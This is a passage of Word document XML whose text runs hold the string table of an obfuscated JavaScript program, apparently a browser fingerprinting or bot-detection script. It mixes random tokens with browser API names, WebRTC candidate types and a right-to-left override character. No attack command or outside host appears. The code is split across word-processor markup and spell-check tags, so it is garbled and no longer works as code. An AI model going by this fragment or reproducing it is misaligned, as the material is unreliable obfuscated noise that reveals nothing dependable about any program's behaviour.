        <w:t>", "value", "ZVzfVL0cce5gKO31iBNf6bU_XRxVw2uqPYeQ00sPsDGAjjctY2UNHoxmqmWfx4D4CWOkSEaGC9vmPIKLPIRg", "Va8i20HK8TaJ2BgtIuqxNmLC0a3vV5FJ7A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zWOBGIo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "hIJQjzqBz2ytv3k", "clf_Z5E6UYZBHYA", "0rYCgX3LvSag431lFcnEayep0Ys", "XSPlU_8KUaVVDu6S", "x6Y-9G0", "g4VFzS7PmDCn4A", "AVy4PeBqZKY", "0I1PjSaKkk229ShlWJjnaCKxxPv7U_lU9xJgDK-gHdM", "BB74cYwWE-QjOsWJ0SA", "o7Ee", "top", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HRnkcPcsOA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "1GbiAJtBWqkfQA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>querySelector</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "O5piuAO1oWeQ_AwoMOj9JlGShOKuPMI", "TG-yWN0oK6NgYKr21HZAyZgWLR8GoUCKUQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lastIndexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "svVtmT-2g2Hb2AlVP7niXBnWtoDSQep0pjctIebtJcoAVvCv5P_O1g", "stQj_ETJ0zE", "S0XubcI_KbduMNid", "apply", "XZRrsmqZ2kyknFEYeZi1VhGd3MvOPdIHxns", "moJV32Hi1h_J", "JfJe3w7StGWN", "bF_xWIwgLchcc-_h6hcnww", "21", "yh6SOPhZU60g", "QE2vJdtjbrdTBPzMqnI7hcAUNTp66EzVOQ", "nZs-uA3Tz0G12yhsXv_SaEE", "hqxh2wKdlVieyww", "vACTKq8", "^[\\x20-\\x7E]$", "C6lK6zutvGe7sDEjBOObO3y7zw", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"OzPkPYcre9wUB4M", "3R3Fd60_Le0", "t9V3-Qo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FjamNPlIHbID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Ui-LBOVPP7oye-I", "bV2nVA", "olaVff54XeY", "KVmUOPB6IplpZbjZiw9K0710fBdI5Q", "BrMF_Ui-skftmTNxeuyAMSCB3feYIax4", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "2A7WWdEP", "Py_2Lp01", "7MpumjmO71bMw0N6eLCxCjndruPxF4IFoysRINW0QNI5Yuj_vIf5pgu6brorAmxOtbYAlMUo9zYI", "qS-MJbBTa7pTNQ", "uE0", "GRznZvUpDeIvC7bo", "U8Me7ieU1lqn_HU", "nkbHEa0xHt9Bc7OLsjcS8Q", "Symbol", "Xxu_bM1hQ6YvGcyQkQs_2JsIGDpJ", "error", "zf5C_Te2lXvvxA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "bRXfAek5TuIuIJLp5hpP8g","sewV-3Hnx2P2qnpzForBfwyvnayLf-wt0lU", "24VrzXOK", "x_46pT7l6GDyvzgAIA", "message", "Vt5e3AOA7HrM6A", "gZA2jS7pzwo", "Mme7JfR6ONoDDt_isz4thYw", "input", "1z2XBqNiMg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PwvWGKc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8XKJIrsvYpNFbA", "-TqlNMp5", "L_VwsEGEtVb82B1iXc_kCwnfmLOHb5BBiTVJG97zGf8peoLw7pf5qSLsH9Y5FmgZ0PRUxeA5txtGlH0", "de0jv0Xz7jfTlAgFNNU", "3lS-BONRELEVKqs", "6vdKrCWtiBCCj35fWZXFWA", "b7wwozC59RGrs2BaHdWwZSXM", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getEntriesByType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "2rY", "lBDZK-paKKF7J6jXjF4a_rYhHUxI1C3_NYWs1A4_pWTPnHNIOA", "D5Q", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hOMAhxnR</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "vudW9iKdnnHP5EhUVKk", "rvJR4iKdknDm-lhe", "HGqrYtxvCP4eZg", "4VeHQuBOObdOa_2snn9etvZwNz90hiSgadXip31y_ALfnXtLHxkPWJ5X91yPv9m-SQn2DlHtS7X0JdqUaNpxZ4IpQB-nvr13ndY", "Fx6vQONA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nodeType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>avlkzCCs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "PbgS80ewlGrbkwRXVOqvFw6n8MA", "OHO5JA", "UbEj5gXXkVffnBZSXeirBlnAzvynO9gKt21tZv__f5xcfcLqhZPhrkGlTf13Om1F2qwZhdV76BFB2AIo727X", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GhmxLog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "\u202EEWibjQBAF\u202D", "x1_gJ582", "Fvg__0_2hFijkh5UPIS9WxSIh6nuOo1S5ykpfLTbHd15Pdj4sKOx_jmSUcN9QSUK_bBN", "aCWVaOIgNsZHFpL-wCgGr6Yy", "ShP4Yb0pQg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pgGNeNZpSLovJbqp_EJb-dkH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "-eRflHi64DL9sC8SLg", "KXu7QcsKPOdrb4WuymVt2A", "8f1t9Qu-2UXT1kghfea9C0HL_LyuJYUO2XRFNKnnAN9qaoas04Grr3_DDdNwCH8SrKt0rqB59TEQiT9x5WnfxinvpdIeWRaBOSUwLI9G", "dV3nZMgAV95JDZ6MmyVx3Ikd", "Image", "xiurMd54FpcP", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getOwnPropertyNames</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "4-Uf0mjK0zvhl3xSR5iEeiD0yJXXSqhwsxIDDvrBOuRDTPTiqdPFnRetJfYLWAlkgt0yh8kUkkA8uQZLsVGoqQKb67Q", "LN2", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gmrwMuMadoAPQME</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "tkPwPo4mKI9qddij8FZr", "rudG9TKdhEX770ZERZCZeheywJc", "Rpsi0UzerDaSzg4-", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mvsvnUXJnCjCxBdfbA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "crypto", "FATicPAwCfYbBb_Q8TZeoYo", "Option", "pow", "qvUenn7bgiPVpy0lFIf_cw", "WroEtnzz0z-jkA", "LNoRz3filR39yg", "iDLEVa0OBPJsVZiB", "object", "khDTIp8UQ_pON6I", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cPUBlHLU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "y1eWB45mQ8E", "EIs9_R_CyBylgUcv", "cpYe1nnA1nM", "JJ9Qiz-1mGyt", "eJlBrRq95267hEt2Qg", "69NU1i6F7mKEuXIqQf_GZA", "Sl6wMt9b", "p1LgNIwmAt8bGZeJ6gNsjMRqBDhT5zDNWvqNlyRQj3er_wgkdA", "3YRFgDed-WSMsD4", "Q9VtuhG5syLu2EVTbdnuGw", "MzPwRIosHc94evzbrQIjqtI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jzOYWQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "self", "F3GvHfFFSf5pFKvi30MYuqBiM10", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RWegOsdw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "n8NlyxqivU7EzWZZaa6gUg", "7SmYbdQgMdVqA6Lu7D8jsLwKVw", "QKhP5DiglHKlpDY", "Function", "kp4", "7-UbqGLM", "UNDEFINED", "WlaXHf9RVqB7LenI3RV--7sqVAlA2nGZJI6b2mxGtg", "MdBAymj_vEL-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>yxoSRIjVIG6i_aXDW6di9DFxbK7ZNQ", "W5pnvSy5", "tGy-MZJcBZ13TJDE10Rpy9ZRGzMV6x7W", "pgCkUPNEV5kWG5WA-G950fkuJSoz0kXedNKa73YN01ay8Wt4PWN4eoU4", "Gb818UDl7lvlgwJrNpv5AhaAwOnE", "A0SzF85HEZpIGdHx5QM", "max", "M0XFbaQsEvdtIf3FziJR5pswVwtD9niwFovoxz9T83fD9kVeDHN2FOEBgly78o6bBginPSraWIn7LYeMJaglHawbdkPCn9gmy6TL6y-irXVJt09H-nUY7w", "sptnpBGuyVa0mgtN", "39YE2nDyjA", "Safari", "l_wCrXXw_inyul0XY4Q", "5o80kl3H9g", "awzFRdkbEI41XvDF4lQYrfg", "9eMd2UKhpg", "xrYynyaX11s", "method", "1G_YCrsCBdlTY_26xnpCqvdm", "s0LrZoQ-MpR2UdXw-1lqh5tZDSsN_RPZGaiXmQcihWP17ActfglBcqR4nk6riLuA", "U_c44GjWtyvJ5HQLNvjWL2Ditw", "mmjjJ88D", "A-YwvgTO1VfUlR8ABqb3Tx2J5ca5I4hSz2E8RaazEJEpbYa2hc6roS6LQA", "7gDWErA", "yUzBcMZgUZBaQN2q5A", "4Tm4CsRXdJo", "9vZGkkSXjVLK7A", "bg2YX-IQYtR5WcCcjg", "E6x89AWoySk", "wVfvOJ8oPL1jT8HG7lx7jg", "jBX7LZ8", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eyWpS_U</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-JA", "LRL1WoYUTLN-KKCntw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>byteLength</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gRezIthr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Xbwz3UDU50eZ1B0hNvCuA2XE5_6rEo1O9XIXOY-qEMcmFbCqsMOHpBX0YrhDQnxk4_ZTjdc_u21L33I8xkjQ7lXtj7Y2", "5UaZQPRQbJY", "OzenP8F0E48JCpDrty5q1I0DPV4i_E_DCaaO_1srlQ", "ywKZetd3V7g7AK6g-Q", "P0vSPq84BfY", "J6Uo6EM", "seUw8TTKsi7xxgtM", "9waqGL0dYsJJO4OK", "EalE9xm4xG6dyGVZNMihCWmSyYI", "rfoqnFTA1QLClkwGboTvXQvatPHgVMNIqWgGQNmhaNAEDfX18s6HsFiqcaA", "Element", "V5lDty3u6XKgq1k0BbSOGQ", "llvbYfReRMNkHZmVt2wVj9k7Hg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FgDFVw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Mt1OnnK0ymf7", "LLwD92GZjWfKnDY", "jI4t8Hfj0Ec", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>YwvYWbsGOw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "uwmFQPVZT7IdOOOExHdKuPRqI0o7niz9Konh_CxIo0SHmkhEH20JCcsQ_X3cmpCqQ0msTlrRR_3oDOnSVowqC-BtSw", "ybkHozPPzD6LhEM", "Al4", "Of5HoCvoslPM", "SWe8XtsdPPx3eqSly2N6x4BUIwgRpEKJ", "Ovty_n_AuA2i9lcYKfM", "SE7nRo40FOFJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>characterSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "wZ4", "R2LQ", "K4Irvg", "String", "PNsPj0rA1Q", "-dJ29jyR1g7txltRZw", "bzKedaxRRfsgbOvNvlkBoM1tTxIDtybrTZ6tlC8TuSuJuBIIE3trCrwYyQbq78TNXRrrKXqdV8PmYNve", "vuhT-RahmHL__Sl3D4jC", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BRqrPttj</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ydBfsSq1g2r4s2hXVZrIahOki9aCKuo5hhs4G6fKf_9XSNbXnuvPkGmYENMuYRw3lZ01tfZL0QZz8RUfrXS7hHCC48tWBlY", "_st4i1rXjnv64Q", "123", "TJBJ3jejmUG5ujR6Xg", "DGKN", "o2mtJtx6bLI", "95FLtjSm_HO9iVFtSJf_", "lDKdf99wE4E", "window", "R1KtaMppXYI", "mivRNPpQLr92BrjdoVkW740", "iPEQmgne4Q_jtEAjAcWwTg", "JSON", "bzSwes9ib8YqA4n0sBIjn5wfXXtE5lKFT7CK2h4-zT3r9UJ_a1Y_I_Am3w", "Y_5X3DWU-WbooCQqD8mZMGXyoYeLC7Udv0B0A7-9Na9GC7Ge_J-AqVnqJetXGls316ogl4YL0Bk6rBYFjQ", "cP144w-q6EDflhIM", "bUDTDp8Ocst4ZK3ZmR4F", "vV66FrRISrY", "BDCsRalkOf0", "tF77bo4sXA", "-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nPHeaA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "HJo68QfVhQSNyEdOfrrsU1qkyfvGNMk", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EoY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "put", "_qpX7BGu42yZyzQ", "JAKzT_ZSaZABVIWHtXMutP5USjpB", "jweAR_prZp0wFMKJoQ", "EQGAF80", "u6Bh-VzS5w", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"0qI6u2-7", "l70P41SyqF7drQx1Xg", "svhHmzeIhDz343QVf_zJRmPs", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wQLdEoo_Wdk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CustomEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Ty-WH-0", "bdR_vA2O72zFrWAIVMA", "O5td03mfngeezlNtTOGlFHHCt50", "a6Nz-xA", "sort", "Uint32Array", "8a4XrHLu2jyprXsGXvaCMHywm9uUPb1zkk8mCsnDJ6lwI8STxcDgj2-HQYxwBVxB0Y1bz-8K3WEVy2Ft00WlgHrW", "_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CmSVMVITOdSY_g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Zo9J3XWQjgmt8XNiZ9c", "J3-tRMhNFtpZR5o", "kr9zyyS6x2K9-g", "VBOzZMFmE4A-T5vJrxsz05wFQXpL_VyFRqKUh21n0w", "oQOeBf5QMKAocg", "ibcb40f40yag1SkoD_uCCg", "some", "zsNi7zTttE-fiRJUfYfnTHrE7L2tK54", "6_hjwg6Nq3bQhkZ_aKA", "H6g13VzO8QySwg88", "4rUYhg", "3D3oYtwSHQ", "ufkUuGztqwPJ9Cl3Wqs", "oa4og1Xa", "-3T4UIgSMtsKYILwpgRv1ZY", "W90", "x1XkeLoiWv1QENqK", "fuIPj23Agg-7qiBf", "sQnlRLAOGsE5BIKKrQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Cm6UB51hdYI", "body", "UGI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pXTI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "kcEWx37doRfW9z9oWA", "0Yx3zxOB", "5OIanWPXsxbE01dMYczzFkmF", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zuE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "call", "OBLVRKE", "C45wvQGHi1KCyCsABd7UEmM", "hLRk5BCxkgyQ", "J2rbQKdRFcsFH5L71Qpy6Ot2URMViS2z", "-WquLso5XIprfOvo", "ucxDrx2hjk3ipWJiQo3SWRilsM2nK_4qhw", "d95whQOTqknZh0F4ew","px0", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>teFm_UbwlXzSng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Reflect", "floor", "QrpV6jzRpiaW92pRcA", "pYsuvHvtkweZ1ltnKbLyVAKI", "6\uFE0F\u20E3", "NGXffrUiR9pGJA", "a9704418b7c42678", "oijSF7UbbOISJu6P1W1HtNR0KUEshD32PJX_9zpYskikykESSC1LS5ge_W3Bq4LgEw", "Lfw04kThix_D2wANPOKyH17U0d2IN9wahG4", "\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uFFFD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>{}", "clear", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>innerText</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Go18shuvknmF_A", "jZBdxSSIzm6R9CYxRLCbdgP2o5DSUvs", "YJlDyDePiWik8xUeBtuJIHE", "d6Za_jK_-02Kq3A_Eg", "7huIVudaQe8kKrvbjCgbg6IhZVVq", "jYJw4mA", "TcMGiEX_0wzRzC0", "6ZYvlFHX5AixiWc-bN2qLUyLuMCw", "yOx7jROTsWzRkEAMYNg", "k7ZfwyCK_nXJ-g", "b9Agj0ninzi0sT0Wa8WhRSPZ", "_HW1Isp0JoB9", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hUrFUrY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "rcNznAixsRmcgREgW6z1", "-7cGxmHayWbA5nwgWcmBOmTq5c-QWfhqihAHUPnlb6QJQq6M_Z_QjlvwN70eNB0y", "Ij69UMtdbZM", "E80CymnN-jbMuQ", "ChLqYowsfbQQRYHK8w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getItem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "DAq_KtBhCp9B", "OkzZWLBJVN8lJ6Sr4wxI_vJsQg4", "d8wx-lv-7inSvlI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>host|srflx|prflx|relay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "LB2XYORpTA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lF_ccdZFWA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "cgs", "complete","zEmUCOVVUqRSKb6hl2MT", "mcA1vkDj7xaYwFA9Pf_vVRiOr_usMNwZ1w", "rif6eQ", "width", "vT7OBqMcIPsAYoXAwU1aoQ", "data", "9BfnFIpTXsUoB-OXsQ", "U8hWjiKAgQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parentNode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ssADyyXfiiv_73Q", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BgzjaYYyDdIBSQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ZxfBULQVVP0pYbyixSUI56FnJRdPyWGy", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uhiUJg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "yxOcO78uCu8uDIjR", "JAD7Xpp5TNBQUdy5pVFB0cU_MS8-lUHbCw", "BYdN226SiQeV8nltac4", "RzT_PZA3L8lcW4o", "vXLVPLJgYJckRtu3tm5R7-Z5HQ", "5AaiC853Xw", "qW-_eth2AY9oWdGYvEdkjcdSESwNqhvSBLnNnSQ5iD7prE14JyM0abxxilfrhauZcHLbVXvlM4bKFNftf6VMXYFWcBjSyZoEs_qj-CyLlk46jz4OvjUfixEe1bBWLyM11AFKkTxyGFChmb9NA5HTQnOkguW46szh51YpbGh4G3yNk5hlWyuGpTTT62ofOKqPM3GsJS4gQWOPxEgcCjOglae43cTPI50STLl_lszMHlbZlYjdDyRJ0zY</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>", "4W6sZb0", "Ud8LkALOwlPlpDkXPZzNfiqp2P2D", "yLcKg1bFsAE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "MH-mP81CVJk", "2rIU0WTI3iOZvyF-S5jKfiWi4djhW_x4-xJxI_uVaNULQame-I3Hi0yBfrsaYgFm285litcK32Ig-QhBj06ms177lfgyY2WvD0R8VMNncqTXUJL-Vd_xOs6zMFC2hdyeaL-VPdOe_LpMRhOi73U5r6wJZwVYQDNKW-j2wIqJ-5B6cX2LhIdoR8QkDZvAlUN_wNtTjpKens9tNajw_dFFe3gUMyY_1HvjrFWSYT0g8bk_ZFdw5tS6eZwnwwcSoyur4LTN_Us7DAuSXKH_fb8oNm2cNrZHChdDbcnOqCR-H7zPK0v41BFq4f3fTNc-gBFEcmUDUH0Nw3w8RJ8wVVnD5aicumkgkIcT8_0KUiMMqnpYA5XVV_xpiuTkYLcfOhNGfaxda_f5Oe2XsvzyraMqYfd4YWM8ZIJPWX8bT5Qj-o86eFuKyT1po1K_wQydaWwJAlZ15DzxTs_up35x5BSVIBLNSwVtA0X-soOvyMxyGd0lUr1saX_zDTPe5M69GkMDHYrd8p3kK5B80c24B2KxwWRGESTiex6redfeKWGn4YslXgsWuw6WpEJIDgSrV7nu2qi3LOnSouDBv5y0GKoQM1rEMTyOyg6CFMkFUBbRxvHOVC0DkMhEyGP2KTa6IzhkWlfiG1j7MD0SnwuHpMcrRBOmhDOPnKDpdcZPXPgER_oDtZVgL7iyJeVArmBjNdoG0GRyqrd0af1I0Z9o9fFO2g-c-Cqc_YPqCcXJBnwlCsYuD_J0zIq7B5Df90gUYx1xHu2C4sP8P0VDpTAMrU1tIHIX_eEgtB-vHWOS7C9TqlzfAi_-3538dszBf_eLsuPL", "JJN32A-Ht12-hwQ1C-qTI0G3pPGKdeR2gw5dQKyidq87dbiSkLA", "8D-SIrkt", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UIEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "hV_pN50", "-k_kGb4aQN5eQNfq_zo", "elHAOfhQRcAsOJif3g", "LhesdeF6WpocDMCyjzd-x40Q", "NALlSco4cw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SubmitEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "FALSE", "L-w6", "__proto__", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>textContent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "hvFLuD70zmyDz28QBg", "80", "KgiAaO59R9AycrmDmVgFoMdxUw", "D6cA8jg", "s8xXkxWj", "TV-EJ-oPM7BcAOLj6itW", "Vst8vQSgz0_wqkEXbN73Cg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>removeEventListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "EK0fy03e", "YLMJvnny_jWXsk8QQA", "fQiOKPZ1FLsFCbrf2FoHstosXygWuCKSBA", "\uD83D\uDE0E", "_jqSTO5LQOk1", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>removeChild</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "UGTEI5p0eo0", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>oEueBKhsMKVMdqE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "x9Uv6kjmkR_v3QZdc66oVCeY2anKftIjh3FFUaS3F7YWYee1_O3rs3WpRg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lLkggXWN_Tf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>_", "7_RV5H7ynzaSxk1ZI8SyTmem1g", "unshift", "z9cngRSLxwbX5Wsncw", "join", "MxuHVr8", "g_BIgD2e_GGkgSZVGoW7", "xsE41lzKmEvKhVFkfL_ofzOLsLzXQc8foj9RaN_hWpR2arz_upyMuAv5a_UFFgAmo7Yf25poxyIBkjpszEI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>phTGBoA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PFWgNNJiUOZhSNU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "CaUlx2XXyAmW", "xcwXq27T6TLs_g", "v7ZJx1-Tigk", "_kuzK9dOeYJMY8Kf", "QT-oP9tIMIUL", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fireEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>detachEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "cos", "29gvq1r3lQPv", "length", "g_F7yCmlqlLbwG8", "D6YnlWrl8w", "LRLMTYU4Fus", "BFawKMF2cJ9BUM2Ip3I9itxbZz0ysxGPRe7esgA9gwO3oE53DChxKe9Fi0_qk9WONyjgNzzoYbCME6T3ObU", "YqFIunXFvS0", "kdJ-kCa0hHbD0QI", "9_gq7kn62Rbc", "Pq4dkyXB_zGG2gR8aOngEXuN", "ITTVfKM8I-M", "T2fc", "lxa9a59ZFdBATt7v22U7ntRLUnEr80eHNuLt-g", "J88uxn66", "rO4Wwg_1nSrD9j0", "OginKcB-DpcIQffNvTl-1aIA", "2j36OZYx", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TATsWZgTF_ksCsk</w:t>
      </w:r>
